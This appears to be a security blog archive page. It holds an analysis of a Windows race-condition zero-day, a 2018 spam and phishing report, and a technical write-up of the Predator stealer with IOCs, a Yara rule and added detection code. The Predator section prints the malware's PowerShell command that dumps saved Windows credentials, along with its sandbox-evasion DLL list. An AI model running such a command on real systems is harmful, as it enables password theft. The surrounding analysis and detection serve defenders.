Snippet of NtDCompositionDestroyConnection syscall inner function (Windows 8.1)

On this screenshot with the simplified logic of the function DiscardAllCompositionFrames that is called from within the NtDCompositionDestroyConnection syscall you can see that it does not acquire the necessary lock and calls the function DiscardAllCompositionFrames that will release all allocated frames. The problem lies in the fact that when the syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection are executed simultaneously, the function DiscardAllCompositionFrames may be executed at a time when the NtDCompositionDiscardFrame syscall is already looking for a frame to release or has already found it. This condition leads to a use-after-free scenario.
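
The missing-lock pattern described above, as an added user-mode model in Python (not the win32k code and not from the original post). Class, field and function names are assumptions, and a `freed` flag stands in for the kernel free so that the stale access is reported rather than corrupting memory.

```python
import threading


class UseAfterFree(Exception):
    """Raised by the model when an already released frame is released again."""


class Frame:
    def __init__(self, frame_id):
        self.frame_id = frame_id
        self.freed = False

    def free(self):
        # Stand-in for the kernel free: the flag lets the model report a stale
        # pointer instead of corrupting memory.
        if self.freed:
            raise UseAfterFree(f"frame {self.frame_id} released twice")
        self.freed = True


class Connection:
    """Toy model of DirectComposition::CConnection; all field names are assumptions."""

    def __init__(self, frame_ids, lock_on_destroy):
        self.frame_lock = threading.Lock()
        self.frames = [Frame(i) for i in frame_ids]
        self.lock_on_destroy = lock_on_destroy
        self.faults = []

    def discard_frame(self, frame_id, race_window=None):
        """Models NtDCompositionDiscardFrame: take the lock, find the frame, free it."""
        with self.frame_lock:
            frame = next((f for f in self.frames if f.frame_id == frame_id), None)
            if frame is None:
                return False
            if race_window is not None:
                race_window()  # the other syscall gets a chance to run right here
            try:
                frame.free()
            except UseAfterFree as exc:
                self.faults.append(str(exc))
                return False
            if frame in self.frames:
                self.frames.remove(frame)
            return True

    def _discard_all_frames(self):
        while self.frames:
            self.frames.pop().free()

    def destroy_connection(self):
        """Models the NtDCompositionDestroyConnection path that releases every frame."""
        if self.lock_on_destroy:
            with self.frame_lock:  # corrected form: same lock as discard_frame
                self._discard_all_frames()
        else:
            self._discard_all_frames()  # as described in the text: no lock taken


def run_interleaving(lock_on_destroy):
    """Start destroy_connection while discard_frame already holds a found frame."""
    conn = Connection([1, 2, 3], lock_on_destroy)
    all_frames = list(conn.frames)
    destroyer = threading.Thread(target=conn.destroy_connection)

    def race_window():
        destroyer.start()
        destroyer.join(timeout=0.5)  # returns early if destroy ran unsynchronized

    conn.discard_frame(2, race_window)
    destroyer.join()
    return {
        "faults": conn.faults,
        "released": sum(f.freed for f in all_frames),
        "still_listed": len(conn.frames),
    }


if __name__ == "__main__":
    print("no lock on destroy:", run_interleaving(lock_on_destroy=False))
    print("lock on destroy:   ", run_interleaving(lock_on_destroy=True))
```

With the lock taken on both paths, the destroy call waits until the single-frame discard has finished, and every frame is released exactly once.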

Interestingly, this is the third race condition zero-day exploit used by the same group in addition to CVE-2018-8589 and CVE-2018-8611.

Stop execution if module file name contains substring “chrome.exe”

The exploit that was found in the wild was targeting 64-bit operating systems in the range from Windows 8 to Windows 10 build 15063. The exploitation process for all those operating systems does not differ greatly and is performed using heap spraying palettes and accelerator tables with the use of GdiSharedHandleTable and gSharedInfo to leak their kernel addresses. In exploitation of Windows 10 build 14393 and higher, windows are used instead of palettes. Besides that, the exploit checks whether it is running from Google Chrome and stops execution if it is, because vulnerability CVE-2019-0797 can’t be exploited within a sandbox.

March 12, 2019

Spam and phishing in 2018

Numbers of the year
  • The share of spam in mail traffic was 52.48%, which is 4.15 p.p. less than in 2017.
  • The biggest source of spam this year was China (11.69%).
  • 74.15% of spam emails were less than 2 KB in size.
  • Malicious spam was detected most commonly with the Win32.CVE-2017-11882 verdict.
  • The Anti-Phishing system was triggered 482,465,211 times.
  • 18.32% of unique users encountered phishing.

Global events and spam

GDPR

In the first months of the year alone, we registered a great many emails in spam traffic connected in some way to the EU General Data Protection Regulation (GDPR). It was generally B2B spam — mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

During this period, there was an upturn in legitimate mailings too. Following the requirements of the regulation, companies sent out notifications on the transition to the GDPR policy requesting user consent to store and process personal data. Unsurprisingly, scammers tried to take advantage. Seeking to gain access to the personal data of clients of well-known companies, they sent out GDPR-related phishing emails prompting recipients to update account information. Users who followed the link in the message and entered the required data immediately had it stolen by the fraudsters. It is worth noting that cybercriminals were interested largely in the data of clients of financial organizations and companies providing IT services.


Phishing emails exploiting the GDPR topic

2018 FIFA World Cup

The FIFA World Cup was one of the main media events of the year, reaching far beyond the world of sport. Scammers exploited the World Cup topic using a variety of classic deception methods based on social engineering. Cybercriminals created fake FIFA partner websites to gain access to victims’ bank accounts, carried out targeted attacks, and set up fake login pages for fifa.com accounts.


Examples of messages with World Cup ticket and trip giveaways

New iPhone launch

As is now customary, Apple’s unveiling of its latest device caused a spike in spam sent, supposedly, from Chinese companies offering accessories and replica gadgets. Such messages redirect the recipient to newly created, generic online stores, which willingly accept payments, but are not so great when it comes to dispatching goods.

The release coincided with a slight rise in the number of phishing messages exploiting the Apple brand (and its services), and emails with malicious attachments:

Malware and the corporate sector

In 2018, the number of malicious messages in spam was 1.2 times less than in 2017; Mail Anti-Virus was triggered a total of 120,310,656 times among Kaspersky Lab clients.

Number of Mail Anti-Virus triggerings among Kaspersky Lab clients in 2018

2018 saw a continuation of the trend for attention to detail in email presentation. Cybercriminals imitated actual business correspondence using the companies’ real details, including signatures and logos. To bypass security solutions (and convince users that files were safe), ISO, IQY, PIF, and PUB attachments were used, all non-typical formats for spam.

Credit organizations remain one of the most popular targets, and this trend is likely to continue in 2019. We also expect an increase in the number of attacks on the corporate sector as a whole.

New distribution channels

We have mentioned before that the distribution of phishing and other fraudulent content has gone beyond the scope of mailings. Scammers are not only testing new means of delivery, but getting victims themselves to distribute malicious content. Some of this year’s most massive attacks we registered in messengers and social networks.

“Self-propagating” phishing messages are similar to long-forgotten chain letters. They refer to non-existent giveaways or free lucrative offers, with one of the conditions for participation being to forward the message to friends or publish it on social media. At the start of the year, scammers used free air ticket lotteries as a bait, before switching to mailings supposedly from popular retail chains, restaurants, stores, and coffee bars. WhatsApp was the most common tool for distributing such messages.

Cryptocurrencies and spam

In 2018, far from waning, spammers’ interest in cryptocurrencies rose. Among the spam messages were fraudulent ones attempting to coerce potential victims into transferring money to cryptocurrency wallets.

One of the most popular kinds of fraud seen last year was “sextortion.” This type of ransom scam is based on the claim to be in possession of private information of an intimate nature. To avoid disclosure, the victim is told to transfer money to the cryptocurrency wallet specified in the message, which often looks very convincing and uses the victim’s actual personal data: name, passwords, phone numbers, etc. Against the backdrop of endless news reports about personal data leaks, such threats, backed up by real details, cause victims to panic and give in to the cybercriminals’ demands. Last year, the ransom sum ranged from a few hundred to several thousand dollars.

Initially, the mailings were aimed at an English-speaking audience, but at the end of Q3 we registered a wave of messages in other languages: German, Italian, Arabic, Japanese, French, Greek, and others.

Neither did the scammers forget about other fraud methods. Over the year, we identified fraudulent mailings supposedly from large charitable organizations asking to help children by purchasing some data etc. All these schemes had a common thread: The money transfer was requested in cryptocurrency. It should be noted that such messages were very few compared with the mailings described above.

In 2019, spammers will continue to exploit the cryptocurrency topic. We expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.

Phishing

Cryptocurrency

Cryptocurrency remains one of the most common phishing topics. In 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges, and platforms. Fraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.

Another hot topic last year was fake ICOs. Scammers invited victims to invest in various initial coin offerings not only by email, but through social media posts as well. There was something for everyone: One of the scams, for example, targeted buzcoin, a cryptocurrency named after Russian singer Olga Buzova. The cybercrooks managed to get hold of the project mailing list and send fake presale invitations to subscribers the day before the start of the ICO. Before the bona fide organizers had time to sneeze, the attackers had scooped around $15,000.

But it was the blockchain project of Pavel Durov, TON, which had the dubious honor of most fakes back in early 2018. The cryptocurrency boom and rumors in late 2017 about an ICO from the creator of Telegram provided fertile ground. Many people believed the scammers and, despite warnings from Pavel himself on social media, transferred money to them.

Lotteries and surveys

Another way to nudge victims into transferring money is via the promise of a guaranteed lottery win or a reward for taking part in a poll. In 2018, our security solutions blocked 3,200,180 attempted redirects to fraudulent websites offering lotteries or surveys.

To take part in the draw, users are asked to make a contribution: the more you give, the more you (supposedly) get. Survey scams work in a similar way. The victim is asked to transfer a sum of money to pay for “administrative costs,” after which the reward will be transferred, or so it is promised.

Universities

Phishers hunt not only for money, but also for knowledge: Over the past year, we registered phishing attacks against 131 universities in 16 countries. More than half (83) were in the US, followed by Britain (21), and Australia and Canada (7 each). One high-profile incident was the theft of millions of documents (including nuclear energy research) from several British universities.

Taxes

In Q1 (the last quarter of the financial year in many countries), we observed a large number of phishing pages imitating the websites of HMRC (UK), the IRS (US), and other countries’ tax authorities. Cybercriminals tried to finagle personal data, answers to security questions, bank account information, and other data from users. Some fake tax service sites distributed malware.


Fake tax service websites

HTTPS

As we wrote a year earlier, the number of phishing pages on domains with SSL certificates has increased. Ironically, this was facilitated by the widespread adoption of HTTPS, since pages with a certificate (and padlock) are trusted far more. But getting hold of a certificate is not hard, especially for competent cybercriminals. The problem has taken on such dimensions that since September 2018 with the latest version of Chrome, the browser has stopped highlighting HTTPS sites with a green padlock in the address bar and marking them as “Secure.” Instead, the “Not secure” label is now assigned to sites without HTTPS.

Sales

Every year, November sees the start of the sales season. First up is World Shopping Day, followed by Black Friday. Cybercriminals prepare for such events in advance and commence their mass attacks long before the sales start. According to our statistics, the number of attempts to redirect users to fraudulent websites exploiting the sales topic starts to rise at the end of October.

Fraudsters use standard methods to extract personal data and money from victims, including fake websites mimicking popular online stores with huge discounts on expensive goods.

Statistics: spam

Proportion of spam in email traffic

The share of spam in email traffic in 2018 decreased by 4.15 p.p. to 52.48%.

Proportion of spam in global email traffic, 2018

The lowest share (47.70%) was recorded in April 2018. The highest (57.26%) belonged to December.

Sources of spam by country

In 2018, China (11.69%) led the list of spamming countries, swapping places with the US and consigning the former leader to second place with 9.04%. Third position went to Germany (7.17%), which climbed into the Top 3 from sixth.

Vietnam, which ranked third last year, fell to fourth place (6.09%). It was followed by Brazil (4.87%), India (4.77%), and Russia (4.29%).

In 8th place, as in 2017, came France (3.34%), while Iran and Italy departed the Top 10. They were replaced by newcomers Spain, which rose from 16th to 9th place (2.20%, +0.72 p.p.), and Britain (2.18%, +0.59 p.p.).

Sources of spam by country, 2018

Spam email size

In 2018, the share of very small (up to 2 KB) messages increased significantly. Despite quarterly decline, the annual figure came in at 74.15%, up 30.75 p.p. against the previous reporting period. The proportion of 2–5 KB messages also increased (10.64%, +5.56 p.p.).

Spam emails by size, 2018

The volume of larger spam dropped significantly against 2017. The share of messages sized 5–10 KB (7.37%) decreased by 1.77 p.p. and 10–20 KB (3.66%) by 12.6 p.p. The share of spam messages sized 20–50 KB (2.82%) saw the biggest drop, down 18.41 p.p.

Malicious attachments in email

Malware families

Top 10 malware families in 2018

In 2018, the most widely distributed malicious objects in email, assigned the Exploit.Win32.CVE-2017-11882 verdict, exploited a Microsoft Office vulnerability for executing arbitrary code without the user’s knowledge.

In second place was the Backdoor.Win32.Androm bot, whose functionality depends on additional modules downloaded at the command of the C&C servers. It was most often used to download malware.

The Trojan-PSW.Win32.Fareit family moved up from fifth to third place. Its main task is to steal data (cookies, passwords for various FTP, mail, and other services). The harvested information is sent to the cybercriminals’ server. Some members of the family are able to download and run other malware.

The Worm.Win32.WBVB family, which includes executable files that are written in Visual Basic 6 (in both P-code and Native mode) and are not trusted in KSN, remained in fourth place.

Fifth place went to the Backdoor.Java.Qrat family, a cross-platform multi-functional backdoor written in Java and sold in the Darknet as a Malware-as-a-Service (MaaS) package. It is generally distributed by email in JAR attachments.

Trojan-Downloader.MSOffice.SLoad, a DOC/DOCX document containing a script that can be executed in MS Word, took sixth place. It is generally used to download and install ransomware on user computers.

The spyware Trojan-Spy.Win32.Noon ranked seventh.

The malware Trojan.PDF.Badur, which consists of a PDF document containing a link to a potentially dangerous website, dropped one place to eighth.

Ninth place was taken by the Trojan.BAT.Obfus family of malicious objects — obfuscated BAT files for running malware and changing OS security settings.

In tenth place, as in the previous year, was the family of Trojan downloaders Trojan.Win32.VBKrypt.

Countries targeted by malicious mailshots

As in previous years, first place in 2018 went to Germany. Its share accounted for 11.51% of all attacks. Second place was taken by Russia (7.21%), and Britain (5.76%) picked up bronze.

Countries targeted by malicious mailshots, 2018

The next three, separated by a whisker, were Italy (5.23%), Brazil (5.10%), and Vietnam (5.09%). Trailing Vietnam by 1.35 p.p. in seventh was the UAE (3.74%). India (3.15%), Spain (2.51%), and Taiwan (2.44%) rounded off the Top 10.

Statistics: phishing

In 2018, the Anti-Phishing system was triggered 482,465,211 times on Kaspersky Lab user computers as a result of phishing redirection attempts (236,233,566 more than in 2017). In total, 18.32% of our users were attacked.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab’s databases.

Rating of categories of organizations attacked by phishers

In 2018, global Internet portals accounted for the lion’s share of heuristic component triggers. Their slice increased by 11.23 p.p. to 24.72% against the previous year. In second place came the banking sector (21.70%), down 5.3 p.p. Payment systems (14.02%) in 2018 ranked third.

Distribution of organizations subject to phishing attacks by category, 2018

Top 3 organizations under attack from phishers

This rating is made of organizations whose names were most frequently used by phishers (according to the heuristic statistics for triggers on user computers). It was the same lineup as in 2017, but rearranged slightly, with Microsoft in first place.

Microsoft   6.86%
Facebook    6.37%
PayPal      3.23%

Attack geography

Countries by share of attacked users

Brazil (28.28%) remains out in front by percentage of attacked unique users out of the total number of users in the country.

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2018

Top 10 countries by share of attacked users

Country      %
Brazil       28.28
Portugal     22.63
Australia    20.72
Algeria      20.46
Réunion      20.39
Guatemala    20.34
Chile        20.09
Spain        20.05
Venezuela    19.89
Russia       19.76

Despite a slight drop of 0.74 p.p., Brazil (28.28%) remains top by number of attacked users. Meanwhile, Portugal (22.63%) moved up to second place (+5.87 p.p.), displacing Australia (20.72%, –1.79 p.p.).

Conclusion

2018 showed that cybercriminals continue to keep a close eye on global events and use them to achieve their goals. We have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019. Despite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this topic.

The past year also demonstrated that spammers and scammers will continue to exploit annually occurring events — new smartphone launches, sales seasons, tax deadlines/rebates, and the like.

There is also a trend toward the transition to new channels of content distribution: Cybercriminals in 2018 used new methods of communication with their “audience,” including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages. Hand in hand with this, as illustrated by the attack on universities, fraudsters are seeking not only new channels, but new targets as well.

March 11, 2019

A predatory tale: Who’s afraid of the thief?

In mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who initially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is that it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was apparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a C2 using a stealer dubbed ‘Predator’.

As soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory dumps, event logs, environment indicators from the network and so on and so forth. Finding very little information about this tool, we decided that seeing as how we’d already dived into the stealer, we might as well share some of our main findings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s versions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide general information about its owners’ activities.

As well as all the information we collected from the client, we went the extra mile and contacted a source who had previously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and 2.3.7 in his blog just a few months ago (October 2018).

He joined Ido Naor, a principal security researcher at Kaspersky Lab and together they compiled a full analysis of the new versions of ‘Predator the thief’.

The blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. An account named Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries until fairly recently.

Predator the thief

Predator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has been detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly adapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim attack vector and are only selling the builder. For a small additional payment they can also generate an administration panel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a little-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for triggers to show up.

Latest version         v3.0.7
Sample MD5             bf4cd781920f2bbe57e7e74a775b8e94
Code Language          C++
File Types             PE
Supported Arch.        x86 and x64
Unpacked Size          <500Kb
Admin Panel Example    https://predatortop.xyz/login
Admin Panel Software   PHP, Apache, Ubuntu

From v2 to v3

Predator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far as large companies go, protection solutions and response teams can detect and remove its activity in a relatively short amount of time.

That said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to extend features and adjusting to client requirements and are generally not that aggressive when it comes to disclosure/analysis of their tool.

Obfuscation

Predator’s owners decided to obfuscate most of its code with a number of simple techniques. XOR, Base64, substitutions, stack strings and more are used to hide API methods, folder paths, registry keys, the C2 server/admin panel and so on.

We sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API call, which we see as a bit like overkill considering the fact that other techniques can be applied to strip the obfuscation.

We’ve written down a list for those who are after a step-by-step guide:

Step   Description
0      Saving arguments somewhere
1      Get the function name
2      Get the library name
3      Recreating GetProcAddress
4      Calling function by a simple register call

Export table

It was also found that the export table trick for getting the API function is far more complex than the one introduced in v2:

Anti-debugging/sandbox checks

Predator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for example, is a hardcoded list of DLLs that are checked if loaded into memory:

  • sbiedll
  • dbghelp
  • api_log
  • pstorec
  • dir_watch
  • vmcheck
  • wpespy
  • SxIn
  • Sf2

Loop for checking list of DLLs

One old trick, for example, that survived the version update is the check of Graphic Card Name introduced in v2.x.x.

Classy but mandatory – browser stealer support

Edge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, differ from the way the malware handles the Gecko and Chromium browsers. In previous versions, Predator usually uses a temporary file (*.col format file) to store browser content (in an SQLite3 database), but for Edge and IE it was replaced with a hardcoded PowerShell command that will directly put the content of the file into a dedicated repository.

powershell.exe -Command "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List Resource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName :', 'Login:').Replace('Password :', 'Password:'); $c > "%PREDATOR_PATH%\General\IeEdgePasswords.txt"
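
A detection for this command line, as an added example that is not from the original post: it flags PowerShell process-creation events that load PasswordVault and call RetrieveAll and RetrievePassword, and labels them Predator-specific when the IeEdgePasswords.txt file name is also present. The event records, field names and verdict strings are constructed assumptions; -EncodedCommand arguments are decoded before matching.

```python
import base64
import re

# Markers taken from the command quoted above. The three API names describe the
# behaviour; the output file name is the Predator-specific part.
VAULT_MARKERS = (
    "windows.security.credentials.passwordvault",
    ".retrieveall()",
    ".retrievepassword()",
)
PREDATOR_FILE = "ieedgepasswords.txt"
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
ENCODED_ARG = re.compile(
    r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I
)


def expand_encoded(cmdline):
    """Append the decoded text of any -EncodedCommand argument (base64 of UTF-16LE)."""
    parts = [cmdline]
    for blob in ENCODED_ARG.findall(cmdline):
        try:
            parts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:
            continue  # not valid base64 or UTF-16LE: match on the raw text only
    return " ".join(parts)


def classify(event):
    """Return a verdict string for one process-creation record, or None."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image not in POWERSHELL_IMAGES:
        return None
    text = expand_encoded(event["cmdline"]).lower()
    if not all(marker in text for marker in VAULT_MARKERS):
        return None
    return "predator-ie-edge-stealer" if PREDATOR_FILE in text else "passwordvault-dump"


# Constructed records; the first command line is abridged from the one quoted above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAGE_CMD = (
    r'powershell.exe -Command "[void][Windows.Security.Credentials.PasswordVault,'
    r"Windows.Security.Credentials,ContentType=WindowsRuntime];"
    r"$vault = New-Object Windows.Security.Credentials.PasswordVault; "
    r"$a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | Out-String); "
    r'$a > "%PREDATOR_PATH%\General\IeEdgePasswords.txt"'
)
RENAMED_CMD = PAGE_CMD.upper().replace("IEEDGEPASSWORDS.TXT", "OUT.TXT")
SCRIPT = (
    "$v = New-Object Windows.Security.Credentials.PasswordVault; "
    "$v.RetrieveAll() | % { $_.RetrievePassword(); $_ }"
)
ENCODED_CMD = "powershell.exe -NoProfile -enc " + base64.b64encode(
    SCRIPT.encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"image": PS, "cmdline": PAGE_CMD},
    {"image": PS, "cmdline": RENAMED_CMD},
    {"image": PS, "cmdline": ENCODED_CMD},
    {"image": PS, "cmdline": 'powershell.exe -Command "Get-ChildItem C:\\Temp"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Temp\IeEdgePasswords.txt"},
]


def triage(events):
    return [classify(event) for event in events]


if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(verdict, "<-", event["cmdline"][:60])
```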

As a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’ sales page:

The false keylogger feature

The owners of Predator list keylogger capabilities among its features, though a closer inspection of the code reveals that no keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer. The functionality includes a crawler that checks if the clipboard contains data, grabs it and places it in a dedicated file the stealer owners have named ‘information.log’.

Thief logs

Diving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The information logger is perhaps the most important collector of Predator. It stores all the tasks performed by the stealer on the victim machine.

We noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers, such as:

  • HWID
  • System Language
  • Keyboard Layout

At the end of the report, the owners added a customer/payload ID – probably to improve support.

Updates

Predator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its popularity. Here’s a summary of the new features in v3:

Location           Data stolen
Games              Osu, Battle.net
FTP                WinSCP
VPN                NordVPN
2FA                Authy
Messengers         Pidgin, Skype
Operating System   Webcam, HWID, Clipboard, Specific document files (Grabber), Project filenames*
Browsers           IE/Edge

*We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files usually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.

Sale point (Russian forums)

We found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and the content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you banned if broken. The two sections (translated using Google) in the image below are examples of forbidden behavior.

It also appears that each offer on the forum must go through a reviewer who decides if the piece of software or service is of financial benefit to the forum administrators, but at the same time fair towards other members.

For 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles (~$1,500), the commission decreases to 10%.

The Predator stealer’s main sales thread was found here:

https://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/

Predator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer install the C&C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers are proactive in delivering updates and ensuring a fast and effective support service.

Telegram as a service

Predator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting over 370 members in this group:

https://t.me/PredatorSoftwareChannel

Another update channel is the seller @sett9.

It appears the Predator administrators are demonstrating FUD capabilities by running a sample generated by the builder of their stealer. However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products as: Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by heuristics.

https://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992

https://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0

The executables above were not found in VirusTotal. According to the group, the links were posted around August of last year (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.

On the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the owners’ release notes, it was implemented with WinSCP and NordVPN support.

IOCs

IP/Domains:

Predator version | IP/Domain
v3.0.3 | 15charliescene15[.]myjino[.]ru
v3.0.4 | axixaxaxu1337[.]us
v3.0.5 | madoko[.]jhfree[.]net
v3.0.6 | kristihack46[.]myjino[.]ru
v3.0.7 | j946104[.]myjino[.]ru

Hashes:

Predator version | MD5 Hash
v3.0.3 | c44920c419a21e07d753ed607fb6d7ca
v3.0.4 | cf2273b943edd0752a09e90f45958c85
v3.0.5 | b2cbb3d80c8d830a3b3c2bd568ba1826
v3.0.6 | dff67a78bb4866f9da5a0c1781ed5348
v3.0.7 | 25F9EC882EAC441D4852F92E0EAB8595

Yara:

rule Predator_The_Thief : Predator_The_Thief {
    meta:
        description = "Yara rule for Predator The Thief 3.0.0+"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2019/02/26"
    strings:
        $mz = { 4D 5A }

        /* Predator V3.0.0+ */
        $x1 = { C6 84 24 ?? ?? 00 00 8C }
        $x2 = { C6 84 24 ?? ?? 00 00 1A }
        $x3 = { C6 84 24 ?? ?? 00 00 D4 }
        $x4 = { C6 84 24 ?? ?? 00 00 03 }
        $x5 = { C6 84 24 ?? ?? 00 00 B4 }
        $x6 = { C6 84 24 ?? ?? 00 00 80 }

        /* Predator V3.0.3 -> 3.0.6 */
        $y1 = { B8 00 E1 F5 05 }
        $y2 = { 89 5C 24 0C }
        $y3 = { FF 44 24 ?? }
        $y4 = { 39 44 24 0C }
        $y5 = { BF 00 00 A0 00 }
    condition:
        $mz at 0 and ( ( all of ($x*)) or (all of ($y*)) )
}
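To show what the Yara rule above keys on and how its condition combines the two string sets, here is an added example (not part of the original article and not the rule author's code) that evaluates the same condition in plain Python. The byte buffers are constructed for the example, and the helper names and the x86 decodings in the comments are this example's own.

```python
import re

# Hex strings copied from the Predator_The_Thief rule ("??" = any byte).
X_STRINGS = {  # each decodes as x86 `mov byte ptr [esp+disp32], imm8`
    "$x1": "C6 84 24 ?? ?? 00 00 8C",
    "$x2": "C6 84 24 ?? ?? 00 00 1A",
    "$x3": "C6 84 24 ?? ?? 00 00 D4",
    "$x4": "C6 84 24 ?? ?? 00 00 03",
    "$x5": "C6 84 24 ?? ?? 00 00 B4",
    "$x6": "C6 84 24 ?? ?? 00 00 80",
}
Y_STRINGS = {
    "$y1": "B8 00 E1 F5 05",  # mov eax, 0x05F5E100
    "$y2": "89 5C 24 0C",     # mov [esp+0Ch], ebx
    "$y3": "FF 44 24 ??",     # inc dword ptr [esp+disp8]
    "$y4": "39 44 24 0C",     # cmp [esp+0Ch], eax
    "$y5": "BF 00 00 A0 00",  # mov edi, 0x00A00000
}


def compile_hex(pattern):
    """Turn a YARA hex string into a compiled bytes regex."""
    parts = [b"." if tok == "??" else b"\\x" + tok.lower().encode("ascii")
             for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def missing_strings(strings, data):
    """Return the names of the strings that never match in data."""
    return sorted(n for n, p in strings.items() if not compile_hex(p).search(data))


def evaluate_rule(data):
    """Evaluate: $mz at 0 and (all of ($x*) or all of ($y*))."""
    mz_at_0 = data[:2] == b"MZ"
    missing_x = missing_strings(X_STRINGS, data)
    missing_y = missing_strings(Y_STRINGS, data)
    return {
        "mz_at_0": mz_at_0,
        "missing_x": missing_x,
        "missing_y": missing_y,
        "match": mz_at_0 and (not missing_x or not missing_y),
    }


STACK_WRITE = compile_hex("C6 84 24 ?? ?? 00 00 ??")


def stack_byte_writes(data):
    """List (stack offset, byte) pairs for every stack byte-write the $x
    strings are a special case of; useful when triaging a near miss."""
    return [(int.from_bytes(m.group()[3:7], "little"), m.group()[7])
            for m in STACK_WRITE.finditer(data)]


# --- Constructed test buffers (not real samples) ---
def mov_stack_byte(disp, imm):
    return b"\xC6\x84\x24" + disp.to_bytes(4, "little") + bytes([imm])


X_IMMS = [0x8C, 0x1A, 0xD4, 0x03, 0xB4, 0x80]
HEADER = b"MZ" + b"\x90" * 62
SAMPLE_X = HEADER + b"".join(mov_stack_byte(0x120 + i, v) for i, v in enumerate(X_IMMS))
SAMPLE_Y = HEADER + bytes.fromhex("B800E1F505 895C240C FF442410 3944240C BF0000A000")
SAMPLE_NO_MZ = b"\x7fELF" + SAMPLE_X[4:]   # same strings, wrong magic at offset 0
SAMPLE_PARTIAL = SAMPLE_X[:-8]             # last stack write ($x6) removed

if __name__ == "__main__":
    for name in ("SAMPLE_X", "SAMPLE_Y", "SAMPLE_NO_MZ", "SAMPLE_PARTIAL"):
        print(name, evaluate_rule(globals()[name]))
```

Because both branches use `all of`, a build that drops a single constant falls out of the rule, which is why the article notes that some v3.0.7 samples are caught only by heuristics or other signatures.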
March 7, 2019

Financial Cyberthreats in 2018

Introduction and Key Findings

The world of finance has been a great source of income for cybercriminals across the world for an obvious reason – money. While governments and organizations have been investing in new methods to protect financial services, malicious users have been investing in how to bypass them. This has fueled many changes in how online financial services and payment systems, large banks and POS terminals are being used.

